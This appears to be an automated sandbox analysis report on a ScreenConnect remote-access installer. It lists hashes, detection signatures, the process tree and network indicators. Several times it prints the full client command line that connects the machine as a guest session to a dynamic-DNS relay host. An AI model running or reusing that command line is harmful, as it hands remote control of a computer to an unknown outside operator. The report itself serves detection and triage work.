Windows Analysis Report
Support.ClientSetup.exe

Overview

General Information

Sample name: Support.ClientSetup.exe
Analysis ID: 1568673
MD5: 6b40938a0c9723db144782829b133286
SHA1: 4e4e55175aa824d118f6cb20d6883a9c1d4d2a39
SHA256: f6f1bd1f20dc68a6adce415ddb8cc509cd4e1f5435e369467abdd70900000cc3

Detection

ScreenConnect Tool
Score: 50
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 32
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64_ra
  • Support.ClientSetup.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\Support.ClientSetup.exe" MD5: 6B40938A0C9723DB144782829B133286)
    • msiexec.exe (PID: 7036 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7072 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7116 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5BDEFC20929AF4DEE946C247B81361C3 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 6168 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7753.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_3897296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 6340 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C21885174D7F3F417F2722ACC2A29DD7 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6196 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C5E78E314317E5DB1425C419FD0D614F E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 6160 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c=" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 6504 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "24be1ff4-4556-4f6e-bdeb-6bf05204e79c" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 6568 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "3473749a-8727-4cb2-bb44-83e8e8d9f56c" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • svchost.exe (PID: 3012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3736 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 5420 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 1916 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 4264 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5752 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
No configs have been found
Source | Rule | Description | Author | Strings
Support.ClientSetup.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
C:\Windows\Installer\inprogressinstallinfo.ipi | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DF541DFE2B6D389D3F.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DF5EA8DB2B84680E0B.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DF97FD4A0028A9EAFA.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Windows\Temp\~DFB36FFE6B04D3445D.TMP | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
(5 further entries not shown)

Source | Rule | Description | Author | Strings
00000000.00000002.1074872097.0000000005FC0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000002.1080490569.0000000007E11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
(6 further entries not shown)

Source | Rule | Description | Author | Strings
0.2.Support.ClientSetup.exe.5fc0000.7.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
9.2.ScreenConnect.WindowsClient.exe.2dafa18.0.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
9.0.ScreenConnect.WindowsClient.exe.8d0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.2.Support.ClientSetup.exe.5fc0000.7.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
(4 further entries not shown)

                                  System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c=", ProcessId: 6160, ProcessName: ScreenConnect.ClientService.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: ScreenConnect Client (a9232c38f7080cfd) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7072, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-ABC2-B94479DC0550}\(Default)
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3012, ProcessName: svchost.exe
                                  No Suricata rule has matched

                                  AV Detection

Source: Support.ClientSetup.exe, ReversingLabs: Detection: 22%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 94.9% probability
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, Code function: 8_2_048716F8 CryptProtectData, 8_2_048716F8
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, Code function: 8_2_048716F1 CryptProtectData, 8_2_048716F1
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, Code function: 8_2_05D92D70 CryptUnprotectData, 8_2_05D92D70
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, Code function: 8_2_05D92D68 CryptUnprotectData, 8_2_05D92D68
Source: C:\Users\user\Desktop\Support.ClientSetup.exe, EXE: msiexec.exe

                                  Compliance

Source: C:\Users\user\Desktop\Support.ClientSetup.exe, EXE: msiexec.exe
Source: Support.ClientSetup.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Support.ClientSetup.exe, Static PE information: certificate valid
Source: Support.ClientSetup.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Support.ClientSetup.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Support.ClientSetup.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160002867.00000000019C0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160464436.0000000001A52000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1103254270.00000000000AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Support.ClientSetup.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1083284190.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Support.ClientSetup.exe, MSI837B.tmp.3.dr, 3b7ed6.rbs.3.dr, MSI8185.tmp.3.dr, 3b7ed7.msi.3.dr, MSI8195.tmp.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 3b7ed5.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: Support.ClientSetup.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Support.ClientSetup.exe, MSI7753.tmp.2.dr, 3b7ed7.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 3b7ed5.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160153814.0000000001A12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160153814.0000000001A12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Support.ClientSetup.exe
Source: C:\Windows\System32\msiexec.exe, File opened: z:
Source: C:\Windows\System32\msiexec.exe, File opened: x:
Source: C:\Windows\System32\msiexec.exe, File opened: v:
Source: C:\Windows\System32\msiexec.exe, File opened: t:
Source: C:\Windows\System32\msiexec.exe, File opened: r:
Source: C:\Windows\System32\msiexec.exe, File opened: p:
Source: C:\Windows\System32\msiexec.exe, File opened: n:
Source: C:\Windows\System32\msiexec.exe, File opened: l:
Source: C:\Windows\System32\msiexec.exe, File opened: j:
Source: C:\Windows\System32\msiexec.exe, File opened: h:
Source: C:\Windows\System32\msiexec.exe, File opened: f:
Source: C:\Windows\System32\svchost.exe, File opened: d:
Source: C:\Windows\System32\msiexec.exe, File opened: b:
Source: C:\Windows\System32\msiexec.exe, File opened: y:
Source: C:\Windows\System32\msiexec.exe, File opened: w:
Source: C:\Windows\System32\msiexec.exe, File opened: u:
Source: C:\Windows\System32\msiexec.exe, File opened: s:
Source: C:\Windows\System32\msiexec.exe, File opened: q:
Source: C:\Windows\System32\msiexec.exe, File opened: o:
Source: C:\Windows\System32\msiexec.exe, File opened: m:
Source: C:\Windows\System32\msiexec.exe, File opened: k:
Source: C:\Windows\System32\msiexec.exe, File opened: i:
Source: C:\Windows\System32\msiexec.exe, File opened: g:
Source: C:\Windows\System32\msiexec.exe, File opened: e:
Source: C:\Windows\System32\svchost.exe, File opened: c:
Source: C:\Windows\System32\msiexec.exe, File opened: a:

                                  Networking

Source: C:\Windows\System32\msiexec.exe, Registry value created: NULL Service
Source: unknown, DNS query: name: fmt2as.ddns.net
Source: global traffic, TCP traffic: 192.168.2.17:49707 -> 194.59.31.27:8041
Source: Joe Sandbox View, ASN Name: COMBAHTONcombahtonGmbHDE
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: fmt2as.ddns.net
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 0000000C.00000002.2323244715.0000027972E00000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: qmgr.db.12.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.12.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/advqtdv6t35gmqvdg3dzxo4krmzq_117.0.5938.149/117.0.5
Source: qmgr.db.12.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.12.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.12.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
